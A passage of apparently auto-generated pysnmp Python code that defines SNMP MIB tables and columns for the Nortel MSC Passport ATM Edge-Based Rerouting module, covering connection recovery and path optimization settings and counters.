mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 7, 7, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,
6, 7))
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 6, 7, 1))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 6, 7, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrIndex.setStatus('mandatory')
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 20))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(
subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue
='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 30))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,
1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 40))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 6, 7, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmIispMIB', 'mscAtmIfVptIispIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptIispEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,
7, 7))
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 7, 7, 1))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 7, 7, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 20))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(
subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue
='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 30))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,
1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 40))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 7, 7, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfVptPnniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptPnniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9,
8, 7))
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 1))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 8, 7, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrIndex.setStatus('mandatory')
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
9, 8, 7, 20))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
9, 8, 7, 30))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 30, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6,
1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(
subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 40))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 40, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 20, 8, 2))
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 20, 8, 2, 1))
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 20, 8, 2, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',
'mscAtmIfVptVccSrcIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',
'mscAtmIfVptVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 20, 8, 2, 20))
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 20, 8, 2, 20, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',
'mscAtmIfVptVccSrcIndex'), (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB',
'mscAtmIfVptVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
'readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1,
4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(
subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
'readwrite')
if mibBuilder.loadTexts:
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
9, 20, 12))
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 20, 12, 1))
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 20, 12, 1, 1)).setIndexNames((0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'), (0,
'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess(
'readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
